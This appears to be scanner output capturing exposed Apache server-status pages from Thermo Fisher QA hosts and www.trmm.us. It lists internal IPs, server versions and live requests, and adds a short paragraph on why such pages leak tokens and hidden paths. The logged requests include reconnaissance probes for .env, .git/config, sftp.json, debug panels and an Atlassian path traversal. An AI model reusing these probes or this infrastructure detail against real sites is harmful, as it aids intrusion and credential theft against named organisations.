10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 22-0201270/1/326R 0.00561159299400.00.095.54 10.253.106.249http/1.1 23-0233630/0/238_ 0.00170122720.00.004.95 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 24-0201280/0/224R 0.005610126800.00.003.14 10.253.106.249http/1.1 25-0233640/0/226_ 0.00170137350.00.003.88 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-0176190/15/238R 0.18391165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012560153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284_ 0.00160489040.00.006.20 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 29-0130150/17/229R 0.16561187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281_ 0.00160190930.00.004.42 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 31-0177860/3/228R 0.0056140131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20561252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1851959132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10518352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002560112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055352242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00160137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233680/0/206_ 0.00160119720.00.002.61 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0104770/17/200R 0.014767124170.00.303.66 10.253.106.249http/1.1 40-0121750/14/368R 0.1951980401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00160136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225032/2/202K 0.0006117891.80.004.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 43-0159970/24/311_ 0.351825267660.00.947.23 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 44-0141670/8/241R 0.00561207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00160170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02566134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005380188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00134184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005530118040.00.002.48 10.253.106.224http/1.1 50-0225041/1/260W 0.0000185991.80.004.36 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 51-0201340/0/334R 0.005530194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0351954160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00160174490.00.004.07 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 54-0233720/0/242_ 0.00160140030.00.004.35 127.0.0.1http/1.1qa1-corporate.thermofisher.com:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879cee7b84b4
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 01-Feb-2023 03:18:25 EST Restart Time: Wednesday, 25-Jan-2023 12:55:48 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 14 hours 22 minutes 37 seconds Server load: 0.01 0.01 0.00 Total accesses: 208579 - Total Traffic: 2.4 GB - Total Duration: 10236475 CPU Usage: u44 s66.3 cu301.06 cs65.71 - .0837% CPU load .366 requests/sec - 4552 B/second - 12.2 kB/request - 49.0772 ms/request 57 requests currently being processed, 40 idle workers WK.KKKRRKRW_RRKKKRRKRR_KKRKK_KKKRKKKKK_K_RKK_K_K_RK_K_R_K____K__ _K__KKRRRRR___RR______K___________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0232045/24/1454W 0.030012752015.70.0941.87 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /s/5343e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 1-0217851/16/1466K 0.0432311549934.10.1740.65 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 2-0-0/0/917. 0.00230424080.00.0015.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0135057016/57016/57016K 35.18403686286894.384.8684.86 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-0135157016/57016/57016K 33.21003504386894.584.8684.86 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0306871/4/1157K 0.0032311730876.10.0136.41 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 6-050410/0/1363R 0.004101659020.00.0024.49 10.253.106.224http/1.1 7-0239250/11/1076R 0.01380121560420.00.0522.81 10.253.106.249http/1.1 8-0322311/1/1016K 0.001381220070.70.0021.32 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 9-077700/49/1192R 0.20421171083910.01.3726.33 10.253.106.224http/1.1 10-0307030/6/1657W 0.01002156660.00.0452.48 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 11-050460/0/1382_ 0.003501030580.00.0077.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 12-0307040/12/1213R 0.0365021818410.00.0827.70 10.253.106.249http/1.1 13-0143880/26/1174R 0.072069718590.00.4413.89 10.253.106.224http/1.1 14-0269631/4/1287K 0.01241325575.50.0236.80 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 15-0307051/2/942K 0.0032291030832.90.0122.11 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 16-0244681/2/1064K 0.0032641490663.80.0119.99 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 17-013980/0/1046R 0.0044701263240.00.0028.83 10.253.106.249http/1.1 18-013990/0/952R 0.004210820660.00.0039.12 10.253.106.224http/1.1 19-014005/9/812K 0.0132494776817.80.0310.91 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 20-0210840/49/999R 0.0864901235980.00.2326.10 10.253.106.249http/1.1 21-025810/3/959R 0.00649411135250.00.0017.27 10.253.106.249http/1.1 22-0224790/12/1344_ 0.0131141254420.00.0725.29 10.253.106.224http/1.1 23-0177503/28/1070K 0.030411098003.20.1316.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 24-0307521/1/1074K 0.0032911347894.20.0020.38 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 25-026690/0/1177R 0.0064901394090.00.0026.86 10.253.106.249http/1.1 26-014697/7/1399K 0.030720964879.50.0828.90 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 27-030484/4/1116K 0.0091179568530.10.0319.45 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 28-0210890/17/1395_ 0.090101904050.00.1754.33 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 29-014701/4/902K 0.02327511138223.00.0524.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 30-0166777/30/1165K 0.0504116157111.10.1344.82 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 31-0307602/3/1429K 0.000271037013.60.0115.90 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 32-0210910/0/1631R 0.0038001447320.00.0033.35 10.253.106.249http/1.1 33-014711/2/1282K 0.0032262510963.60.0120.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 34-02109314/39/1564K 0.0701128409433.60.8937.01 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /telescope/requests HTTP/1.1 35-019622/6/1305K 0.010311557911.60.1130.02 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 36-0210948/19/1200K 0.0201114114724.60.0718.36 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 37-0308445/11/1207K 0.020101805425.50.0423.23 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 38-0308480/7/950_ 0.003113984370.00.0431.42 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 39-0308495/5/1310K 0.002541310540218.40.0219.43 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0239270/30/1100_ 0.08113800140.00.3224.89 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 41-0240130/10/1097R 0.3851317749790.00.9833.98 10.253.106.224http/1.1 42-030671/1/1111K 0.009101030331.00.0022.55 10.253.106.224http/1.1qa1.onelambda.com:80GET / HTTP/1.1 43-0322323/6/930K 0.012191312119212.30.0220.10 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 44-0322330/0/1320_ 0.002401213260.00.0025.10 10.253.106.224http/1.1 45-0322931/1/1636K 0.00217142312658.50.0171.72 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 46-0217960/10/1253_ 0.0311021127170.00.0724.68 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-0240381/29/867K 0.04133181188557.50.1141.61 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 48-050470/0/1138_ 0.003201199110.00.0016.79 127
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c92c0955b
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Wednesday, 01-Feb-2023 03:18:24 EST Restart Time: Wednesday, 25-Jan-2023 12:55:48 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 14 hours 22 minutes 36 seconds Server load: 0.01 0.01 0.00 Total accesses: 208534 - Total Traffic: 2.4 GB - Total Duration: 10234703 CPU Usage: u43.97 s66.29 cu301.06 cs65.71 - .0837% CPU load .366 requests/sec - 4552 B/second - 12.2 kB/request - 49.0793 ms/request 57 requests currently being processed, 40 idle workers KK.KKKRRRR__RRKKKRRKRR_RKRKKKKKKRKKKKK_K_RKK_K_K_RK_W_R_K____K__ ____KKRRRRR___RR_____KK___________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0232042/21/1451K 0.030712733613.50.0941.87 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 1-0217851/16/1466K 0.0430311549934.10.1740.65 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 2-0-0/0/917. 0.00220424080.00.0015.04 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0135057016/57016/57016K 35.18303686286894.384.8684.86 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-0135157015/57015/57015K 33.21903504286893.084.8684.86 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0306871/4/1157K 0.0030311730876.10.0136.41 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 6-050410/0/1363R 0.004001659020.00.0024.49 10.253.106.224http/1.1 7-0239250/11/1076R 0.01379121560420.00.0522.81 10.253.106.249http/1.1 8-0322310/0/1015R 0.003701219290.00.0021.32 10.253.106.224http/1.1 9-077700/49/1192R 0.20419171083910.01.3726.33 10.253.106.224http/1.1 10-0307030/6/1657_ 0.013702156660.00.0452.48 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 11-050460/0/1382_ 0.003401030580.00.0077.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 12-0307040/12/1213R 0.0364821818410.00.0827.70 10.253.106.249http/1.1 13-0143880/26/1174R 0.072049718590.00.4413.89 10.253.106.224http/1.1 14-0269631/4/1287K 0.01041325575.50.0236.80 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 15-0307051/2/942K 0.0030291030832.90.0122.11 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 16-0244681/2/1064K 0.0030641490663.80.0119.99 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 17-013980/0/1046R 0.0044501263240.00.0028.83 10.253.106.249http/1.1 18-013990/0/952R 0.004190820660.00.0039.12 10.253.106.224http/1.1 19-014005/9/812K 0.0130494776817.80.0310.91 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 20-0210840/49/999R 0.0864801235980.00.2326.10 10.253.106.249http/1.1 21-025810/3/959R 0.00648411135250.00.0017.27 10.253.106.249http/1.1 22-0224790/12/1344_ 0.0130141254420.00.0725.29 10.253.106.224http/1.1 23-0177500/25/1067R 0.033741096910.00.1316.46 10.253.106.249http/1.1 24-0307521/1/1074K 0.0030911347894.20.0020.38 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 25-026690/0/1177R 0.0064801394090.00.0026.86 10.253.106.249http/1.1 26-014693/3/1395K 0.0301320955275.90.0728.90 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 27-030484/4/1116K 0.0089179568530.10.0319.45 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 28-0210894/15/1393K 0.0901519038471.80.1754.33 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 29-014701/4/902K 0.02307511138223.00.0524.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/bootst 30-0166773/26/1161K 0.05061613677.50.1344.82 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 31-0307601/2/1428K 0.0030451036472.90.0115.90 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 32-0210910/0/1631R 0.0037901447320.00.0033.35 10.253.106.249http/1.1 33-014711/2/1282K 0.0030262510963.60.0120.50 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 34-02109312/37/1562K 0.070728399331.60.8837.01 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 35-019621/5/1304K 0.0130591155726.00.1130.01 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/uti 36-0210944/15/1196K 0.0203814097215.90.0718.35 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 37-0308441/7/1203K 0.010141803491.30.0423.22 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /config.json HTTP/1.1 38-0308480/7/950_ 0.003013984370.00.0431.42 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 39-0308495/5/1310K 0.002521310540218.40.0219.43 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 40-0239270/30/1100_ 0.08013800140.00.3224.89 10.253.106.224http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 41-0240130/10/1097R 0.3851217749790.00.9833.98 10.253.106.224http/1.1 42-030671/1/1111K 0.009001030331.00.0022.55 10.253.106.224http/1.1qa1.onelambda.com:80GET / HTTP/1.1 43-0322323/6/930K 0.012181312119212.30.0220.10 10.253.106.249http/1.1www.qa.thermofisher.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 44-0322330/0/1320_ 0.002301213260.00.0025.10 10.253.106.224http/1.1 45-0322931/1/1636K 0.00216142312658.50.0171.72 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 46-0217960/10/1253_ 0.0301021127170.00.0724.68 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-0240381/29/867K 0.04131181188557.50.1141.61 10.253.106.224http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 48-050470/0/1138_ 0.003101199110.00.0016.79 127.0.0.1http/1.1qa1-corporate.thermofisher.com:
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c14455b4d
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:19 EDT Restart Time: Wednesday, 19-Oct-2022 16:16:11 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 13 hours 38 minutes 8 seconds Server load: 0.01 0.03 0.03 Total accesses: 20336 - Total Traffic: 538.1 MB - Total Duration: 713109 CPU Usage: u2.58 s5.05 cu16.19 cs10.83 - .0706% CPU load .414 requests/sec - 11.2 kB/second - 27.1 kB/request - 35.0663 ms/request 80 requests currently being processed, 6 idle workers WWWRRWRWRRKRWRWRWKKWKWWWWWRRWWRWRWWKRKRRWWWRWWKRWRWWRWWWKRWRRWRK RWRWWRWWWWWKRWR_R_____.......................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0170741/1/3808W 0.0010112560.80.006.10 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 1-0183024/4/3659W 0.000074634.90.0028.04 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 2-0188090/0/115W 0.000097620.00.001.34 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-0183030/0/129R 0.00387060410.00.001.62 10.253.106.227http/1.1 4-0130260/7/191R 0.023881566990.00.063.85 10.253.106.227http/1.1 5-0188100/0/94W 0.000046670.00.000.79 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 6-0174490/4/97R 0.003882013162440.00.010.52 10.253.106.227http/1.1 7-0174505/5/93W 0.0000170145.80.0116.84 10.253.106.240http/1.1qa1.onelambda.com:80GET /s/32332e33362e3136322e3639/_/;/META-INF/maven/com.atlassia 8-0178170/1/182R 0.006931652380.02.593.04 10.253.106.227http/1.1 9-0166750/4/72R 0.013884336050.00.050.33 10.253.106.227http/1.1 10-0175685/5/140K 0.0082014109446.00.010.46 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 11-0178180/0/83R 0.00695016650.00.000.36 10.253.106.240http/1.1 12-0146977/21/108W 0.10002146518.80.560.96 10.253.106.227http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 13-0166770/151/256R 0.38695338214140.00.792.50 10.253.106.240http/1.1 14-0183042/2/221W 0.0010122892.30.001.27 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 15-0178190/4/225R 0.004972017196560.00.7487.06 10.253.106.240http/1.1 16-0188111/1/31W 0.00002744.90.000.08 10.253.106.240http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 17-01667914/17/114K 0.02020462402027.00.050.94 10.253.106.227http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 18-081101434/1436/1491K 0.913065052171.42.122.71 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 19-0188130/0/96W 0.000014580.00.004.17 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 20-075101434/1438/1519K 0.977056842169.12.1332.54 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 21-0188140/0/77W 0.0000518800.00.000.42 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 22-0188151/1/146W 0.000037371.10.003.40 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 23-0183060/1/271W 0.0000125850.00.001.24 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 24-0188160/0/81W 0.000048360.00.000.55 10.253.106.240http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 25-0188211/1/139W 0.000095721.00.003.57 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 26-0167330/7/46R 0.01693201587920.00.020.35 10.253.106.227http/1.1 27-0167340/2/37R 0.00693201559580.00.050.64 10.253.106.240http/1.1 28-0188220/0/161W 0.000093710.00.001.69 10.253.106.240http/1.1qa1.onelambda.com:80GET /api/search?folderIds=0 HTTP/1.1 29-0188230/0/109W 0.000038910.00.0027.36 10.253.106.240http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 30-0102430/45/145R 0.1969510755930.00.500.80 10.253.106.240http/1.1 31-0183101/1/57W 0.000012340.90.002.35 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 32-0167360/13/206R 0.0469516103050.00.163.18 10.253.106.240http/1.1 33-0183110/1/156W 0.000082790.00.004.50 10.253.106.240http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 34-0183122/2/91W 0.000046535.90.010.29 10.253.106.240http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 35-0175721/1/128K 0.00825124291.90.004.55 10.253.106.227http/1.1www.qa.thermofisher.com:80HEAD /onelambda/us/en/home.html HTTP/1.1 36-0147040/10/138R 0.023881446550.00.103.79 10.253.106.227http/1.1 37-0167372/3/31K 0.008057514719.80.170.31 10.253.106.227http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 38-0167380/3/138R 0.006922016311170.00.070.51 10.253.106.227http/1.1 39-088470/236/271R 0.516932087296500.01.242.70 10.253.106.227http/1.1 40-0188240/0/85W 0.000035960.00.000.91 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 41-0188250/0/109W 0.000057820.00.005.87 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 42-0183130/1/121W 0.000065750.00.000.53 10.253.106.240http/1.1qa1.onelambda.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-0167400/2/78R 0.0069512529050.00.011.23 10.253.106.240http/1.1 44-0188260/0/88W 0.000039510.00.000.50 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 45-0188270/0/46W 0.00007960.00.000.20 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /config.json HTTP/1.1 46-0183151/1/96K 0.002031747325.00.003.57 10.253.106.240http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 47-0147050/1/117R 0.00693202981590.00.0148.81 10.253.106.227http/1.1 48-0183160/1/175W 0.000072050.00.013.89 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 49-0120330/39/166R 0.076922017112940.00.260.96 10.253.106.240http/1.1 50-0183170/0/41W 0.000014650.00.000.34 10.253.106.240http/1.1qa1.onelambda.com:80
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5977b849d56
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 07:22:14 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 13 hours 33 minutes 53 seconds Server load: 0.07 0.02 0.00 Total accesses: 268941 - Total Traffic: 15.3 GB CPU Usage: u597.82 s106.34 cu0 cs0 - .0705% CPU load .269 requests/sec - 16.0 kB/second - 59.6 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no1yes117010 39765no1yes018010 4106151no0yes018000 5123272no0yes018000 619783no0yes018000 79491no0yes018000 85337no0yes018000 949846no1yes018010 Sum1003 1179030 ______________________________________________W_________________ ________________________________________________________________ ____________________________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/428/955_ 140.4711500.07.2832.86 127.0.0.1http/1.1 0-0100440/422/952_ 141.645500.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562171 HT 0-0100440/420/933_ 141.6114610.05.589.11 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/943_ 140.405500.06.847.82 127.0.0.1http/1.1 0-0100440/412/930_ 141.6211310.02.384.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/438/964_ 141.5631110.09.7211.53 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/406/913_ 140.3811300.02.863.93 127.0.0.1http/1.1 0-0100440/396/939_ 141.647110.02.453.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/392/897_ 140.397110.02.924.89 127.0.0.1http/1.1 0-0100440/423/964_ 141.6213110.05.567.47 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/389/919_ 140.4613110.06.618.13 127.0.0.1http/1.1 0-0100440/396/898_ 140.4134110.07.027.86 127.0.0.1http/1.1 0-0100440/399/919_ 140.4331110.05.176.03 127.0.0.1http/1.1 0-0100440/409/939_ 140.4427810.02.463.48 127.0.0.1http/1.1 0-0100440/436/952_ 141.5634110.02.223.36 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/952_ 141.5827810.05.927.56 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/435/946_ 141.6211500.08.629.89 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657448504236 HT 